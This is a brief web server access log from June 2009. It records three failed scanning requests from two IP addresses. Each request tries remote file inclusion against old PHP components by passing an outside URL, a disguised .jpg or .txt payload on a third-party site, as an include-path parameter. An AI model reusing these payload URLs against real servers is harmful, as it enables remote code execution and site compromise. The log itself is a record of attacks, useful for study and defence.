84.201.208.50 - - [21/Jun/2009:04:47:43 -0400] "GET /logs//index.php/?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:48:06 -0400] "GET /skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:04:48:06 -0400] "GET /logs/skin/zero_vote/error.php%20/modules/TotalCalendar/about.php?inc_dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
